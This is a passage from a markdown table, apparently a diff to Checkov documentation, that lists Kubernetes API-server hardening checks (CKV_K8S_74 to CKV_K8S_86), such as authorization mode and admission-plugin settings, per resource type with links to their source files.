[ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3028 | CKV_K8S_74 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3029 | CKV_K8S_74 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3030 | CKV_K8S_74 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3031 | CKV_K8S_74 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3032 | CKV_K8S_74 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3033 | CKV_K8S_74 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3034 | CKV_K8S_74 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3035 | CKV_K8S_74 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3036 | CKV_K8S_75 | resource | CronJob | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3037 | CKV_K8S_75 | resource | DaemonSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3038 | CKV_K8S_75 | resource | Deployment | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3039 | CKV_K8S_75 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3040 | CKV_K8S_75 | resource | Job | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3041 | CKV_K8S_75 | resource | Pod | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3042 | CKV_K8S_75 | resource | PodTemplate | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3043 | CKV_K8S_75 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3044 | CKV_K8S_75 | resource | ReplicationController | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3045 | CKV_K8S_75 | resource | StatefulSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3046 | CKV_K8S_77 | resource | CronJob | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3047 | CKV_K8S_77 | resource | DaemonSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3048 | CKV_K8S_77 | resource | Deployment | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3049 | CKV_K8S_77 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3050 | CKV_K8S_77 | resource | Job | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3051 | CKV_K8S_77 | resource | Pod | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3052 | CKV_K8S_77 | resource | PodTemplate | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3053 | CKV_K8S_77 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3054 | CKV_K8S_77 | resource | ReplicationController | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3055 | CKV_K8S_77 | resource | StatefulSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3056 | CKV_K8S_78 | resource | AdmissionConfiguration | Ensure that the admission control plugin EventRateLimit is set | Kubernetes | [ApiServerAdmissionControlEventRateLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py) | +| 3057 | CKV_K8S_79 | resource | CronJob | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3058 | CKV_K8S_79 | resource | DaemonSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3059 | CKV_K8S_79 | resource | Deployment | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3060 | CKV_K8S_79 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3061 | CKV_K8S_79 | resource | Job | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3062 | CKV_K8S_79 | resource | Pod | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3063 | CKV_K8S_79 | resource | PodTemplate | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3064 | CKV_K8S_79 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3065 | CKV_K8S_79 | resource | ReplicationController | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3066 | CKV_K8S_79 | resource | StatefulSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3067 | CKV_K8S_80 | resource | CronJob | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3068 | CKV_K8S_80 | resource | DaemonSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3069 | CKV_K8S_80 | resource | Deployment | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3070 | CKV_K8S_80 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3071 | CKV_K8S_80 | resource | Job | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3072 | CKV_K8S_80 | resource | Pod | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3073 | CKV_K8S_80 | resource | PodTemplate | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3074 | CKV_K8S_80 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3075 | CKV_K8S_80 | resource | ReplicationController | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3076 | CKV_K8S_80 | resource | StatefulSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3077 | CKV_K8S_81 | resource | CronJob | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3078 | CKV_K8S_81 | resource | DaemonSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3079 | CKV_K8S_81 | resource | Deployment | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3080 | CKV_K8S_81 | resource | DeploymentConfig | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3081 | CKV_K8S_81 | resource | Job | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3082 | CKV_K8S_81 | resource | Pod | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3083 | CKV_K8S_81 | resource | PodTemplate | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3084 | CKV_K8S_81 | resource | ReplicaSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3085 | CKV_K8S_81 | resource | ReplicationController | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3086 | CKV_K8S_81 | resource | StatefulSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3087 | CKV_K8S_82 | resource | CronJob | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3088 | CKV_K8S_82 | resource | DaemonSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3089 | CKV_K8S_82 | resource | Deployment | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3090 | CKV_K8S_82 | resource | DeploymentConfig | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3091 | CKV_K8S_82 | resource | Job | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3092 | CKV_K8S_82 | resource | Pod | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3093 | CKV_K8S_82 | resource | PodTemplate | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3094 | CKV_K8S_82 | resource | ReplicaSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3095 | CKV_K8S_82 | resource | ReplicationController | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3096 | CKV_K8S_82 | resource | StatefulSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3097 | CKV_K8S_83 | resource | CronJob | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3098 | CKV_K8S_83 | resource | DaemonSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3099 | CKV_K8S_83 | resource | Deployment | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3100 | CKV_K8S_83 | resource | DeploymentConfig | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3101 | CKV_K8S_83 | resource | Job | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3102 | CKV_K8S_83 | resource | Pod | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3103 | CKV_K8S_83 | resource | PodTemplate | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3104 | CKV_K8S_83 | resource | ReplicaSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3105 | CKV_K8S_83 | resource | ReplicationController | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3106 | CKV_K8S_83 | resource | StatefulSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3107 | CKV_K8S_84 | resource | CronJob | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3108 | CKV_K8S_84 | resource | DaemonSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3109 | CKV_K8S_84 | resource | Deployment | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3110 | CKV_K8S_84 | resource | DeploymentConfig | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3111 | CKV_K8S_84 | resource | Job | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3112 | CKV_K8S_84 | resource | Pod | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3113 | CKV_K8S_84 | resource | PodTemplate | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3114 | CKV_K8S_84 | resource | ReplicaSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3115 | CKV_K8S_84 | resource | ReplicationController | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3116 | CKV_K8S_84 | resource | StatefulSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3117 | CKV_K8S_85 | resource | CronJob | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3118 | CKV_K8S_85 | resource | DaemonSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3119 | CKV_K8S_85 | resource | Deployment | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3120 | CKV_K8S_85 | resource | DeploymentConfig | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3121 | CKV_K8S_85 | resource | Job | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3122 | CKV_K8S_85 | resource | Pod | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3123 | CKV_K8S_85 | resource | PodTemplate | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3124 | CKV_K8S_85 | resource | ReplicaSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3125 | CKV_K8S_85 | resource | ReplicationController | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3126 | CKV_K8S_85 | resource | StatefulSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3127 | CKV_K8S_86 | resource | CronJob | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3128 | CKV_K8S_86 | resource | DaemonSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3129 | CKV_K8S_86 | resource | Deployment | Ensure that the --insecure-bind-address argument is not set | Kubernetes | 